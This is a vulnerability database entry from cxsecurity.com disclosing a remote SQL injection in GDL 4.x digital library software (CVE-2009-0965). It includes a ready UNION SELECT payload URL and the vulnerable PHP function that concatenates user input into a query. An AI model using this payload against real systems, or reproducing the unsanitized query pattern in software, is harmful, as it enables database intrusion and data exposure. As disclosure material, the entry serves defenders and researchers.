Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
GDL 4.x (node) Remote SQL Injection Vulnerability
2009.03.20
Credit:
g4t3w4y
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-0965
CWE:
CWE-89
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
******************************************************************************************* [ Discovered by g4t3w4y \ jkthackerlink[at]gmail.com ] [ transitory only http://jakartaweb.net/home/GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ] ################################################### # [ GDL v.4.x ] SQL Injection Vulnerability # ################################################### # # Script: # GDL 4.0 | htdocs .gz # GDL 4.0 | windows application # GDL 4.2 | htdocs .zip # # Script site: http://kmrg.itb.ac.id # Download: http://kmrg.itb.ac.id # # [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2-- # # Bug: ./functions/browse.php (line: 286-311) # # function browse_child_list($node) # { # $strsql = "SELECT folder.*, folder_tree.NODE # FROM folder, folder_tree # WHERE # folder_tree.PARENT = '$node' AND # folder_tree.NODE = folder.NODE "; # # $dbres = mysql_query($strsql); # # if ($dbres){ # while ($row = mysql_fetch_array($dbres)){ // SQL inj # $html .= browse_folder_print($row,2); # } # # if (!empty($html)){ # $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>"; # return $box_html; # } else { # return NULL; # } # } else { # stdout_error(mysql_error()); # return NULL; # } # } ################################################## # Greetz: cozmaster * E-C-H-O Team * and otherz.. # ################################################## [ g4t3w4y / 2009 ] *******************************************************************************************
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top